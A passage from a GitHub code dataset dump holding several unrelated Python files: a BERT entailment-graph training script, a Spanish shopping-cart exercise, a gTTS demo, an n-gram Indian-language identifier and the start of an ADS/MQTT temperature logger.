type-pair, the predicates for each timestamp#entity_1#entity_2 are \"\n \"recorded. For each timestamp and entity pair, the predicates in an interval around the timestamp are \"\n \"considered. In all our experiments, the interval is set to infinity, so the timestamps are basically not \"\n \"used. Preliminary experiments with smaller intervals didn't show any improvements in entailment graph \"\n \"learning. It is possible to use the code with smaller intervals if we re-generate the trels folder.\"\n )\n\n parser.add_argument(\n \"--all_triples_path\",\n default=None,\n type=str,\n required=False,\n help=\"The input triples split folder (train, dev, and test). If supplied, we split the tripe mentions based on\"\n \"those triples. Otherwise, we split the triple mentions randomly.\"\n )\n\n parser.add_argument(\n \"--num_batches_eval\",\n type=int,\n default=1,\n help=\"Deprecated. It should be 1. previously: number of batches to evaluate. If -1, evaluate everyting!\",\n )\n\n parser.add_argument(\n \"--model_type\",\n default=None,\n type=str,\n required=True,\n help=\"Model type selected in the list: \" + \", \".join(MODEL_CLASSES.keys()),\n )\n parser.add_argument(\n \"--model_name_or_path\",\n default=None,\n type=str,\n required=True,\n help=\"Path to pre-trained model or shortcut name\",\n )\n\n parser.add_argument(\n \"--output_dir\",\n default=None,\n type=str,\n help=\"The output directory where the model predictions and checkpoints will be written.\",\n )\n\n # Other parameters\n\n parser.add_argument(\n \"--tokenizer_name\", # Not important\n default=\"\",\n type=str,\n help=\"Pretrained tokenizer name or path if not the same as model_name\",\n )\n parser.add_argument(\n \"--cache_dir\",\n default=\"\",\n type=str,\n help=\"Where do you want to store the pre-trained models downloaded from s3\",\n )\n\n parser.add_argument(\n \"--max_seq_length\",\n default=40,\n type=int,\n help=\"The maximum total input sequence length after tokenization. Sequences longer \"\n \"than this will be truncated, sequences shorter will be padded.\",\n )\n\n parser.add_argument(\n \"--pred_dims\",\n default=-1,\n type=int,\n help=\"The number of dimensions for the predicate. By default (-1), it will be set to hidden_size\",\n )\n\n parser.add_argument(\n \"--num_examples\",\n default=8500000,\n type=int,\n help=\"The number of examples (triple mentions) in the corpus. Default is for the NewsSpike corpus.\",\n )\n\n parser.add_argument(\n \"--preferred_num_labels\",\n type=int,\n default=0,\n help=\"The number of (extra) hypothesis predicates that we want to compute contextual link prediction scores for.\"\n \" We always compute the contextual link prediction scores for all the predicates in the current batch. We \"\n \"either set this to A) 0, that means we don't evaluate any extra predicates and the candidate predicates\"\n \"will be only the ones in the current batch (used for training and building entailment graphs for\"\n \"performance reasons); or B)infinity (100000 for the NewsSpike corpus) which means that we want the\"\n \"candidate predicates to contain all the possible predicates in the corpus (used for evaluation of the\"\n \"contextual link prediction).\"\n )\n\n parser.add_argument(\n \"--num_fill\",\n default=100,\n type=int,\n help=\"When building the entailment graphs using the CNCE Markov Chain model, if the number of observed \"\n \"connected predicates for a triple mention is less than num_fill, we augment the Markov Chain by \"\n \"connecting the mentions to predicted predicates so that the number of total connections becomes num_fill \"\n \"(the parameter K in the paper). If the number of all predicates with the same types is less than \"\n \"num_fill, the triple mention will be connected to all existing predicates with the same types.\"\n )\n\n parser.add_argument(\n \"--neg_ratio\",\n type=float,\n default=1.0,\n help=\"Number of negative labels per positive. Can be used in training, but not for eval or building the graphs.\"\n \"Was not used in the paper experiments as it did not yield improved results.\",\n )\n\n parser.add_argument(\n \"--alpha\",\n type=float,\n default=.5,\n help=\"The combination coefficient for the novel connection (the parameter alpha in the paper). Used when \"\n \"building entailment graphs\",\n )\n\n parser.add_argument(\n \"--beta_comb\",\n type=float,\n default=.5,\n help=\"This is the beta parameter in the paper, i.e., the weight to put on entailment graphs (1-beta will be \"\n \"put on the contextual model). Used when doing contextual link prediction based on the combination of the\"\n \"trained model and the entailment graphs.\",\n )\n\n parser.add_argument(\n \"--num_processes\",\n type=int,\n default=1,\n help=\"number of processes for building entailment graphs. Was 1 for the NewsSpike experiments.\",\n )\n\n parser.add_argument(\n \"--process_idx\",\n type=int,\n default=0,\n help=\"process_idx for building entailment graphs. Useful when num_processes is higher than 1.\",\n )\n\n parser.add_argument(\n \"--entgraph_dir\",\n default=\"entgraphs\",\n type=str,\n help=\"The output entgraph_dir, used with do_build_entgraph\",\n )\n\n parser.add_argument(\n \"--embs_init_path\",\n default=None,\n type=str,\n help=\"The pred_embs_init path for either reading or writing. Not used in the current experiments\",\n )\n\n parser.add_argument(\n \"--do_eval_ext\",\n default=None,\n type=str,\n help=\"eval_file extension just for easier distinction between output files.\",\n )\n\n parser.add_argument(\n \"--entscore_mode\",\n default=\"contextual\",\n type=str,\n help=\"Entailment graph score mode: contextual, binary, or count. All the paper experiments were done with the\"\n \"`contextual` mode\",\n )\n\n parser.add_argument(\n \"--device_name\",\n default=None,\n type=str,\n help=\"device_name used in torch.\",\n )\n\n parser.add_argument(\n \"--prebuilt_entgraph_dir\",\n default=None,\n type=str,\n help=\"The pre-built entailment graph directory on only the training portion of the triples. Used when evaluating\"\n \"the entailment graphs (either alone or combined with the contextual model) on the contextual link\"\n \"prediction task\",\n )\n\n parser.add_argument(\n \"--prebuilt_simSuffix\",\n default=\"_sim.txt\",\n type=str,\n help=\"Prebuilt Entailment graph simSuffix, i.e., the suffix at the end of the entailment graph files (e.g.,\"\n \"person#location_sim.txt)\",\n )\n\n parser.add_argument(\n \"--prebuilt_featIdx\",\n default=0,\n type=int,\n help=\"Prebuilt Entailment graph featIdx. 0 means the first feature (similarity score) in the entailment graph \"\n \"files.\",\n )\n\n parser.add_argument(\n \"--triple_count_path\",\n default=None,\n type=str,\n help=\"Where to write triple_count_path. Will be used in evaluating normal link pred models.\",\n )\n\n parser.add_argument(\"--mask_ents_prob\", default=0.0, type=float,\n help=\"Probability of masking entities with types during training. Not used in the paper\")\n parser.add_argument(\"--do_train\", action=\"store_true\", help=\"Whether to run training.\")\n parser.add_argument(\"--do_build_entgraphs\", action=\"store_true\", help=\"Whether to run build entailment graphs.\")\n parser.add_argument(\"--use_only_training_data_to_build_entgraphs\",\n action=\"store_true\",\n help=\"Whether the entailment graphs are built using only the training portion of the triple \"\n \"mentions, or the full triple mentions (training, dev, and test sets).\")\n parser.add_argument(\"--do_eval\", action=\"store_true\", help=\"Whether to run eval on the dev set.\")\n parser.add_argument(\"--do_test\", action=\"store_true\", help=\"Whether to run test on the test set\")\n parser.add_argument(\"--combine_entgraph_emb\", action=\"store_true\",\n help=\"Whether to combine ent graphs and emb model\"\n \" for contextual link prediction.\")\n parser.add_argument(\n \"--evaluate_during_training\", action=\"store_true\", help=\"Run evaluation during training at each logging step.\"\n )\n parser.add_argument(\n \"--do_lower_case\", action=\"store_true\", help=\"Set this flag if you are using an uncased model.\"\n )\n parser.add_argument(\"--freeze11\", action=\"store_true\", help=\"Whether to freeze the first 11 layers of BERT\")\n parser.add_argument(\"--freeze12\", action=\"store_true\", help=\"Whether to freeze the first 12 layers of BERT. Used \"\n \"for ablation studies.\")\n parser.add_argument(\"--no_argord\", action=\"store_true\",\n help=\"Whether to not do arg order mapping. Used for ablation\"\n \" studies\")\n parser.add_argument(\"--updated_len_loader\", action=\"store_true\", help=\"Whether to update len function to not divide\"\n \"by bsz\")\n parser.add_argument(\"--write_output\", action=\"store_true\", help=\"Whether to write output of inference for ent graph\"\n \"building or evaluation\")\n\n parser.add_argument(\"--contextual_hyp\", action=\"store_true\", help=\"Contextual hyp or not. Not used in the paper.\")\n\n parser.add_argument(\"--pmi\", action=\"store_true\", help=\"Whether to weight scores by PMI between entpair and pred.\"\n \"Not used in the paper\")\n\n parser.add_argument(\"--hard_negs\", action=\"store_true\",\n help=\"Whether to generate hard negative examples instead of \"\n \"random ones. Not used in the paper\")\n\n parser.add_argument(\"--per_gpu_batch_size\", default=8, type=int, help=\"Batch size per GPU/CPU for training.\")\n parser.add_argument(\n \"--gradient_accumulation_steps\",\n type=int,\n default=1,\n help=\"Number of updates steps to accumulate before performing a backward/update pass.\",\n )\n parser.add_argument(\"--learning_rate\", default=5e-5, type=float, help=\"The initial learning rate for Adam.\")\n parser.add_argument(\"--ctx_lr_ratio\",\n default=1.0,\n type=float,\n help=\"The initial learning rate ratio for contextualized embeddings vs other parameters. The\"\n \"learning rate for contextualized embeddings is: learning_rate * ctx_lr_ratio\")\n parser.add_argument(\"--weight_decay\", default=0.0, type=float, help=\"Weight decay if we apply some.\")\n parser.add_argument(\"--adam_epsilon\", default=1e-8, type=float, help=\"Epsilon for Adam optimizer.\")\n parser.add_argument(\"--max_grad_norm\", default=1.0, type=float, help=\"Max gradient norm.\")\n parser.add_argument(\n \"--num_train_epochs\", default=3.0, type=float, help=\"Total number of training epochs to perform.\"\n )\n parser.add_argument(\n \"--max_steps\",\n default=-1,\n type=int,\n help=\"If > 0: set total number of training steps to perform. Override num_train_epochs.\",\n )\n parser.add_argument(\"--warmup_steps\", default=0, type=int, help=\"Linear warmup over warmup_steps.\")\n\n parser.add_argument(\"--logging_steps\", type=int, default=500, help=\"Log every X updates steps.\")\n parser.add_argument(\"--save_steps\", type=int, default=5000, help=\"Save checkpoint every X updates steps.\")\n\n parser.add_argument(\"--no_cuda\", action=\"store_true\", help=\"Avoid using CUDA when available\")\n parser.add_argument(\n \"--overwrite_output_dir\", action=\"store_true\", help=\"Overwrite the content of the output directory\"\n )\n parser.add_argument(\"--seed\", type=int, default=42, help=\"random seed for initialization\")\n\n parser.add_argument(\n \"--fp16\",\n action=\"store_true\",\n help=\"Whether to use 16-bit (mixed) precision (through NVIDIA apex) instead of 32-bit\",\n )\n parser.add_argument(\n \"--fp16_opt_level\",\n type=str,\n default=\"O1\",\n help=\"For fp16: Apex AMP optimization level selected in ['O0', 'O1', 'O2', and 'O3'].\"\n \"See details at https://nvidia.github.io/apex/amp.html\",\n )\n parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"For distributed training: local_rank\")\n parser.add_argument(\"--server_ip\", type=str, default=\"\", help=\"For distant debugging.\")\n parser.add_argument(\"--server_port\", type=str, default=\"\", help=\"For distant debugging.\")\n args = parser.parse_args()\n\n if not args.do_train:\n args.output_dir = args.model_name_or_path\n\n if (\n os.path.exists(args.output_dir)\n and os.listdir(args.output_dir)\n and args.do_train\n and not args.overwrite_output_dir\n ):\n raise ValueError(\n \"Output directory ({}) already exists and is not empty. Use --overwrite_output_dir to overcome.\".format(\n args.output_dir\n )\n )\n\n if args.pred_dims != -1:\n print(\"args.pred_dims: \" + str(args.pred_dims))\n from modeling_bert_contextual_link_pred import BertForEntGraphsHiddenSize as BertForEntGraphs\n MODEL_CLASSES[\"bert\"] = (BertConfig, BertForEntGraphs, BertTokenizer)\n\n if args.num_processes > 1 and not args.do_build_entgraphs:\n raise ValueError(\"Multi processing only possible when building the graphs.\")\n\n # Setup distant debugging if needed\n if args.server_ip and args.server_port:\n # Distant debugging - see https://code.visualstudio.com/docs/python/debugging#_attach-to-a-local-script\n import ptvsd\n\n print(\"Waiting for debugger attach\")\n ptvsd.enable_attach(address=(args.server_ip, args.server_port), redirect_output=True)\n ptvsd.wait_for_attach()\n\n # Setup CUDA, GPU & distributed training\n if args.local_rank == -1 or args.no_cuda:\n if not args.device_name:\n device = torch.device(\n \"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\")\n else:\n device = torch.device(\n args.device_name if torch.cuda.is_available() and not args.no_cuda else \"cpu\")\n if args.evaluate_during_training:\n print(\"setting n_gpu to 1\")\n args.n_gpu = 1\n else:\n args.n_gpu = 0 if args.no_cuda else torch.cuda.device_count()\n if args.evaluate_during_training:\n args.n_gpu = 1\n else: # Initializes the distributed backend which will take care of sychronizing nodes/GPUs\n torch.cuda.set_device(args.local_rank)\n device = torch.device(\"cuda\", args.local_rank)\n torch.distributed.init_process_group(backend=\"nccl\")\n args.n_gpu = 1\n args.device = device\n\n # Setup logging\n logging.basicConfig(\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\n datefmt=\"%m/%d/%Y %H:%M:%S\",\n level=logging.INFO if args.local_rank in [-1, 0] else logging.WARN,\n )\n logger.warning(\n \"Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s\",\n args.local_rank,\n device,\n args.n_gpu,\n bool(args.local_rank != -1),\n args.fp16,\n )\n\n # Set seed\n _set_seed(args)\n\n # Load pretrained model and tokenizer\n if args.local_rank not in [-1, 0]:\n torch.distributed.barrier() # Make sure only the first process in distributed training will download model & vocab\n\n entgrAgg = EntGraphAggregator(args.trels_folder, args.pmi, args.hard_negs, -1, args.all_triples_path, args.num_fill,\n args.alpha, args.write_output)\n\n args.model_type = args.model_type.lower()\n config_class, model_class, tokenizer_class = MODEL_CLASSES[args.model_type]\n\n config = config_class.from_pretrained(\n args.model_name_or_path,\n cache_dir=args.cache_dir if args.cache_dir else None,\n )\n\n config.num_all_labels = int(entgrAgg.num_all_labels)\n config.pred_dims = args.pred_dims\n\n tokenizer = tokenizer_class.from_pretrained(\n args.tokenizer_name if args.tokenizer_name else args.model_name_or_path,\n do_lower_case=args.do_lower_case,\n cache_dir=args.cache_dir if args.cache_dir else None,\n )\n\n # don't load model if building entgraph with binary mode\n loadModel = not ((args.do_build_entgraphs and args.entscore_mode == \"binary\") or (\n (args.do_eval or args.do_test) and args.prebuilt_entgraph_dir and not args.combine_entgraph_emb))\n\n if loadModel:\n\n print(\"loading pretrained model\")\n model = model_class.from_pretrained(\n args.model_name_or_path,\n from_tf=bool(\".ckpt\" in args.model_name_or_path),\n config=config,\n cache_dir=args.cache_dir if args.cache_dir else None,\n )\n print(\"model loaded\")\n #\n\n if args.freeze11:\n unfrozen_layers = [\"pooler\", \"cls\", \"pred_embs\", \"encoder.layer.11\"]\n for name, param in model.named_parameters():\n if not any([layer in name for layer in unfrozen_layers]):\n print(\"[FROZE]: %s\" % name)\n param.requires_grad = False\n else:\n print(\"[FREE]: %s\" % name)\n param.requires_grad = True\n\n if args.freeze12:\n unfrozen_layers = [\"pooler\", \"cls\", \"pred_embs\"]\n for name, param in model.named_parameters():\n if not any([layer in name for layer in unfrozen_layers]):\n print(\"[FROZE]: %s\" % name)\n param.requires_grad = False\n else:\n print(\"[FREE]: %s\" % name)\n param.requires_grad = True\n\n else:\n model = None\n\n if args.local_rank == 0:\n torch.distributed.barrier() # Make sure only the first process in distributed training will download model & vocab\n\n if model:\n model.to(args.device)\n\n logger.info(\"Training/evaluation parameters %s\", args)\n best_steps = 0\n\n # Training\n if args.do_train:\n args.num_batches_eval = 1\n train_dataset = get_iterable_dataset(args, entgrAgg, evaluate=False, tokenizer=tokenizer)\n eval_dataset = None\n if args.evaluate_during_training:\n eval_dataset = get_iterable_dataset(args, entgrAgg, evaluate=True, tokenizer=tokenizer)\n\n if args.embs_init_path:\n embs = entgrAgg.get_init_emb_weights(args.embs_init_path)\n model.init_emb_weights(embs)\n global_step, tr_loss, best_steps = train(args, train_dataset, eval_dataset, model, tokenizer)\n logger.info(\" global_step = %s, average loss = %s\", global_step, tr_loss)\n\n # Building entailment graphs\n if args.do_build_entgraphs:\n\n if not args.use_only_training_data_to_build_entgraphs:\n all_dataset = get_iterable_dataset(args, entgrAgg, all=True, tokenizer=tokenizer)\n else:\n all_dataset = get_iterable_dataset(args, entgrAgg, evaluate=False, tokenizer=tokenizer)\n checkpoints = [args.output_dir]\n logger.info(\"Building the entailment graphs with the following checkpoints: %s\", checkpoints)\n\n for checkpoint in checkpoints:\n # global_step = checkpoint.split(\"-\")[-1] if len(checkpoints) > 1 else \"\"\n prefix = checkpoint.split(\"/\")[-1] if checkpoint.find(\"checkpoint\") != -1 else \"\"\n model = None\n if loadModel:\n print(\"loading model for build ent graph\")\n model = model_class.from_pretrained(checkpoint)\n model.to(args.device)\n build_entgraphs(args, all_dataset, model, entgrAgg, prefix)\n\n # Saving best-practices: if you use defaults names for the model, you can reload it using from_pretrained()\n if args.do_train and (args.local_rank == -1 or torch.distributed.get_rank() == 0):\n # Create output directory if needed\n if not os.path.exists(args.output_dir) and args.local_rank in [-1, 0]:\n os.makedirs(args.output_dir)\n\n logger.info(\"Saving model checkpoint to %s\", args.output_dir)\n # Save a trained model, configuration and tokenizer using `save_pretrained()`.\n # They can then be reloaded using `from_pretrained()`\n model_to_save = (\n model.module if hasattr(model, \"module\") else model\n ) # Take care of distributed/parallel training\n model_to_save.save_pretrained(args.output_dir)\n tokenizer.save_pretrained(args.output_dir)\n\n # Good practice: save your training arguments together with the trained model\n torch.save(args, os.path.join(args.output_dir, \"training_args.bin\"))\n\n # Load a trained model and vocabulary that you have fine-tuned\n model = model_class.from_pretrained(args.output_dir)\n tokenizer = tokenizer_class.from_pretrained(args.output_dir)\n model.to(args.device)\n\n # Evaluation\n results = {}\n if (args.do_eval or args.do_test) and args.local_rank in [-1, 0]:\n # if not args.do_train:\n # args.output_dir = args.model_name_or_path\n\n args.num_batches_eval = 1\n\n args.eval_batch_size = args.per_gpu_batch_size * max(1, args.n_gpu)\n if args.do_eval:\n eval_dataset = get_iterable_dataset(args, entgrAgg, evaluate=True, tokenizer=tokenizer)\n else:\n eval_dataset = get_iterable_dataset(args, entgrAgg, test=True, tokenizer=tokenizer)\n\n eval_dataloader = DataLoader(eval_dataset, batch_size=args.eval_batch_size)\n\n model = None\n prebuilt_entgr_col = None\n\n global_step = 0\n\n if loadModel:\n\n checkpoints = [args.output_dir]\n logger.info(\"Evaluate the following checkpoints: %s\", checkpoints)\n for checkpoint in checkpoints:\n print(\"loading model for evaluation\")\n model = model_class.from_pretrained(checkpoint)\n model.to(args.device)\n\n if args.prebuilt_entgraph_dir:\n prebuilt_entgr_col = PreBuiltEntGraphCollection(args.prebuilt_entgraph_dir, args.prebuilt_featIdx,\n args.prebuilt_simSuffix, entgrAgg)\n\n if args.combine_entgraph_emb:\n if args.do_eval:\n eval_file = open(\"eval_final_\" + args.model_name_or_path.split(\"/\")[1] + \"_\" +\n args.prebuilt_entgraph_dir.split(\"/\")[-1] + \"_feature_index_\" + str(args.prebuilt_featIdx) + (\n \"_\" + args.do_eval_ext if args.do_eval_ext else \"\") + \".txt\", \"w\")\n else:\n eval_file = open(\"test_final_\" + args.model_name_or_path.split(\"/\")[1] + \"_\" +\n args.prebuilt_entgraph_dir.split(\"/\")[-1] + \"_feature_index_\" + str(args.prebuilt_featIdx) + (\n \"_\" + args.do_eval_ext if args.do_eval_ext else \"\") + \".txt\", \"w\")\n\n elif loadModel:\n if args.do_eval:\n eval_file = open(\"eval_final_\" + args.model_name_or_path.split(\"/\")[1] + (\n \"_\" + args.do_eval_ext if args.do_eval_ext else \"\") + \".txt\", \"w\")\n else:\n eval_file = open(\"test_final_\" + args.model_name_or_path.split(\"/\")[1] + (\n \"_\" + args.do_eval_ext if args.do_eval_ext else \"\") + \".txt\", \"w\")\n else:\n if args.do_eval:\n eval_file = open(\n \"eval_final_\" + args.prebuilt_entgraph_dir.split(\"/\")[-1] + \"_feature_index_\" + str(args.prebuilt_featIdx) + (\n \"_\" + args.do_eval_ext if args.do_eval_ext else \"\") + \".txt\", \"w\")\n else:\n eval_file = open(\n \"test_final_\" + args.prebuilt_entgraph_dir.split(\"/\")[-1] + \"_feature_index_\" + str(args.prebuilt_featIdx) + (\n \"_\" + args.do_eval_ext if args.do_eval_ext else \"\") + \".txt\", \"w\")\n\n iter_eval_dataloader = iter(eval_dataloader)\n\n eval_AP = 0\n eval_loss = 0\n\n types2AP = defaultdict(float)\n types2loss = defaultdict(float)\n types2count = defaultdict(float)\n\n while not eval_dataset.finished:\n results, iter_eval_dataloader, eval_dataset = evaluate(args, model, iter_eval_dataloader, eval_dataset,\n eval_file, prebuilt_entgr_col=prebuilt_entgr_col,\n tokenizer=tokenizer)\n current_batch_size, current_batch_type = eval_dataset.current_batch_size, eval_dataset.current_batch_types\n current_ratio = current_batch_size / eval_dataset.batch_size\n global_step += current_ratio\n types2count[eval_dataset.current_batch_types] += current_ratio\n if results:\n for key, value in results.items():\n print(\"eval_{}\".format(key), value, current_batch_size)\n if \"_AP\" in key:\n eval_AP += value * current_ratio\n types2AP[eval_dataset.current_batch_types] += value * current_ratio\n elif \"_loss\" in key:\n eval_loss += value * current_ratio\n types2loss[eval_dataset.current_batch_types] += value * current_ratio\n\n eval_file.write(\"\\ntypes results:\\n\\n\")\n\n types_results = []\n for types in types2count:\n types_results.append((types2AP[types] / types2count[types], types2loss[types] / types2count[types], types,\n types2count[types]))\n\n types_results = sorted(types_results, key=lambda x: -x[3])\n for types_result in types_results:\n for res in types_result:\n eval_file.write(str(res) + \"\\t\")\n eval_file.write(\"\\n\")\n\n eval_file.write(\"\\naccumulated results:\\n\\n\")\n\n eval_MAP = eval_AP / global_step\n eval_file.write(\"MAP: \" + str(eval_MAP) + \"\\n\")\n\n eval_Mloss = eval_loss / global_step\n eval_file.write(\"mean eval_loss: \" + str(eval_Mloss) + \"\\n\")\n\n if best_steps:\n logger.info(\"best steps of eval acc is the following checkpoints: %s\", best_steps)\n return results\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mjhosseini/open_contextual_link_pred","sub_path":"modeling/run_contextual_link_pred.py","file_name":"run_contextual_link_pred.py","file_ext":"py","file_size_in_byte":44878,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"29381852579","text":"p1=[1,\"Pokemon X\",33.77]\np2=[2,\"Nintendo XL\",203]\np3=[3,\"Mario Kart 7\",27.58]\np4=[4,\"PlayStation 4\",348.00]\np5=[5,\"FIFA 16\",51.19]\n\nproductoss = p1, p2, p3, p4, p5\nprecio_de_productos = productoss[2]\n\nc_p1 = 0\nc_p2 = 0\nc_p3 = 0\nc_p4 = 0\nc_p5 = 0\n\nwhile True:\n inicio = input(\"¿Que productos y cuantos quieres comprar?: \")\n if inicio == \"ver\":\n if c_p1 > 0:\n print(\"{}...{}\".format(c_p1, p1[1]))\n if c_p2 > 0:\n print(\"{}...{}\".format(c_p2, p2[1]))\n if c_p3 > 0:\n print(\"{}...{}\".format(c_p3, p3[1]))\n if c_p4 > 0:\n print(\"{}...{}\".format(c_p4, p4[1]))\n if c_p5 > 0:\n print(\"{}...{}\".format(c_p5, p5[1]))\n elif inicio == \"checkout\":\n\n total = c_p1*p1[2] + c_p2*p2[2] + c_p3*p3[2] + c_p4*p4[2] + c_p5 * p5[2]\n\n if c_p1 > 0 and c_p2 > 0 and c_p3 > 0:\n total = total * 0.8\n\n elif c_p4 > 0 and c_p5 > 0:\n total = total * 0.85\n\n print(\"El total es: {}\".format(round(total,1)))\n break\n\n else:\n producto_cantidad = inicio.split(\",\")\n producto = int(producto_cantidad[0])\n cantidad = int(producto_cantidad[1])\n\n if producto == p1[0]:\n c_p1 += cantidad\n elif producto == p2[0]:\n c_p2 += cantidad\n elif producto == p3[0]:\n c_p3 += cantidad\n elif producto == p4[0]:\n c_p4 += cantidad\n elif producto == p5[0]:\n c_p5 += cantidad\n\n\n\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito2_ej4/hito2_ej4_81c6bd40760a666289f821cca514fbaa.py","file_name":"hito2_ej4_81c6bd40760a666289f821cca514fbaa.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37346423288","text":"# \n\nfrom gtts import gTTS\nimport os\n\ndef Text_To_Speech(myText,language):\n output = gTTS(text=myText,lang=language,slow=False)\n\n outputPath = os.getcwd() + \"/Text-To-Speech/output/\" + language + \"-language.mp3\"\n\n output.save(outputPath)\n\n\n# myText = \"Hello !! My name is kaushal\"\nmyText = '''\nit's all right\n'''\nlanguage = \"ja\"\n\nText_To_Speech(myText,language)\n","repo_name":"kaushal-project/Projects","sub_path":"Text-To-Speech/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74285164408","text":"import os\nimport sys\nimport math\nimport re\nimport argparse\nimport codecs\nimport string\ntry:\n import cPickle as pickle\nexcept:\n import pickle\nfrom collections import defaultdict\n\nLANGUAGES = {\"as\": \"Assamese\", \"gu\": \"Gujarati\", \"hi\": \"Hindi\",\n \"ka\": \"Kannada\", \"ml\": \"Malayalam\",\n \"mr\": \"Marathi\", \"or\": \"Oriya\", \"pa\": \"Punjabi\", \"ta\": \"Tamil\", \"te\": \"Telugu\"}\n\nMIN_NGRAM_LENGTH = 1\nMAX_NGRAM_LENGTH = 3\nMAX_NUM_OF_NGRAMS = 1000\nPENALTY = 1250\nLANGUAGE_MODELS = '/languagemodels/'\n\n\ndef get_input_ngrams(input):\n \"\"\"[summary]\n\n Args:\n input ([string]): [input text by user]\n\n Returns:\n [list of tupeles]: [Each tuple contains ngram and its frequency]\n \"\"\"\n ngram_counts = {}\n input = cleanup_data(input)\n for length in range(MIN_NGRAM_LENGTH, MAX_NGRAM_LENGTH + 1):\n for i in range(len(input) - length):\n ngram = input[i:i + length]\n if ngram in ngram_counts:\n ngram_counts[ngram] += 1\n else:\n ngram_counts[ngram] = 1\n ngram_tuples = (sorted(ngram_counts.items(),\n key=lambda item: item[1], reverse=True))\n return ngram_tuples\n\n\ndef get_ngram_ranks(ngram_tuples):\n \"\"\"[summary]\n\n Args:\n ngram_tuples ([list of tuples]): [Each tuple in the list contains an ngram and its frequency]\n\n Returns:\n [dictionary]: [key is ngram and value is its rank when sorted in decreasing order]\n \"\"\"\n ngram_ranks = {}\n ranks_limit = MAX_NUM_OF_NGRAMS\n if len(ngram_tuples) >= MAX_NUM_OF_NGRAMS:\n ranks_limit = MAX_NUM_OF_NGRAMS\n else:\n ranks_limit = len(ngram_tuples)\n for i in range(ranks_limit):\n ngram = ngram_tuples[i][0]\n ngram_ranks[ngram] = i\n return ngram_ranks\n\n\ndef cleanup_data(data):\n \"\"\"[summary]\n\n Args:\n data ([string]): [input data]\n\n Returns:\n [string]: [clean up of punctuations, numbers]\n \"\"\"\n exclude = set(string.punctuation)\n data = ''.join(ch for ch in data if ch not in exclude)\n data = ''.join(ch for ch in data if not ch.isdigit())\n data = \" \" + data + \" \" * (MAX_NGRAM_LENGTH - 1)\n if not isinstance(data, str):\n return str(data, \"utf-8\", errors='strict')\n return data\n\n\ndef load_language_models():\n \"\"\"[summary]\n\n Returns:\n [dictionary]: [Contains language model that was already trained for each language]\n \"\"\"\n dic = {}\n \n for lang in LANGUAGES:\n #path = os.getcwd()+ LANGUAGE_MODELS + LANGUAGES[lang] + \".p\"\n name = \"{0}.p\".format(LANGUAGES[lang])\n path_dir = os.path.join(os.path.dirname(__file__), 'language-models')\n path = os.path.join(path_dir, name)\n lang_dic = pickle.load(\n open(path, \"rb\"))\n #open('{0}\\\\{1}.p'.format(LANGUAGE_MODELS, LANGUAGES[lang]), \"rb\"))\n dic[LANGUAGES[lang]] = lang_dic\n return dic\n\n\ndef get_difference(input_ngram_ranks, language_model):\n \"\"\"[summary]\n\n Args:\n input_ngram_ranks ([dictionary]): [contains ngram and its frequency of input]\n language_model ([dictionary]): [contains ngram and frequency of language train data]\n\n Returns:\n [int]: [score reflecting matching ngrams between input and language]\n \"\"\"\n difference = 0\n for ngram in input_ngram_ranks:\n if ngram in language_model:\n position_in_text = input_ngram_ranks[ngram]\n position_in_language = language_model[ngram]\n difference += abs(position_in_language - position_in_text)\n else:\n difference += PENALTY\n return difference\n\n\ndef compare_input_with_languages(language_models, input_ngram_ranks):\n \"\"\"[summary]\n\n Args:\n language_models ([dict]): [contains ngram and its frequency of train data]\n input_ngram_ranks ([dict]): [contains ngram and frequency of input]\n\n Returns:\n [list]: [contains list of tuples with language and its difference with given input]\n \"\"\"\n differences = []\n for language in language_models:\n difference = get_difference(\n input_ngram_ranks, language_models[language])\n differences.append((language, difference))\n return differences\n\n\ndef get_closest_language(differences):\n \"\"\"[summary]\n\n Args:\n differences ([list]): [contains tuples with language and difference score]\n\n Returns:\n [tuple]: [containing 3 closest possible languages to given input]\n \"\"\"\n # print(differences)\n differences_sorted = sorted(differences, key=lambda item: item[1])\n return differences_sorted[0][0], differences_sorted[1][0], differences_sorted[2][0]\n\n\ndef which_lang(input):\n \"\"\"[summary]\n\n Args:\n input ([string]): [description]\n\n Returns:\n [tuple]: [containing 3 closest possible languages to given input]\n \"\"\"\n language_models = load_language_models()\n input_ngrams = get_input_ngrams(input)\n input_ngram_ranks = get_ngram_ranks(input_ngrams)\n # print(len(input_ngram_ranks))\n # print(len(input))\n # print(input_ngram_ranks)\n # sys.exit()\n differences = compare_input_with_languages(\n language_models, input_ngram_ranks)\n return get_closest_language(differences)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', required=True, help=\"input file\")\n args = parser.parse_args()\n with open(args.f) as file:\n input = file.read()\n file.close()\n print((which_lang(input)))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"xtraspeed/whichlang","sub_path":"whichlang/whichlang.py","file_name":"whichlang.py","file_ext":"py","file_size_in_byte":5518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27821819310","text":"# -*- coding: utf-8 -*-\nimport ads\nimport ast\nimport csv\nimport datetime\nimport mqtt\nimport os\nimport parsing_and_assignment\nimport time\n\npath = os.path.join(os.getcwd(), 'data_files', 'TemperaturePerformanceTest.csv')\nfile_exists = os.path.isfile(path)\n\nclass temp_performance_test():\n\n def __init__(self):\n self.ads_instance = ads.ads()\n self.mqtt_instance = mqtt.mqtt()\n self.ads_instance.connect(ams_netID=\"X.XX.XXX.XXX.X.X\", host=\"XXX.XXX.XXX.XXX\")\n self.var_list = parsing_and_assignment.getRawADSVarListFromSymbols(self.ads_instance)\n self.mqtt_instance.connect()\n self.mqtt_instance.client.subscribe(\"#\", qos=0)\n self.mqtt_instance.on_message = self.listen\n self.mqtt_instance.start_mqtt()\n\n def listen(self, client=None, userdata=None, msg=None):\n try:\n with open(path, 'a', newline='') as f:\n # 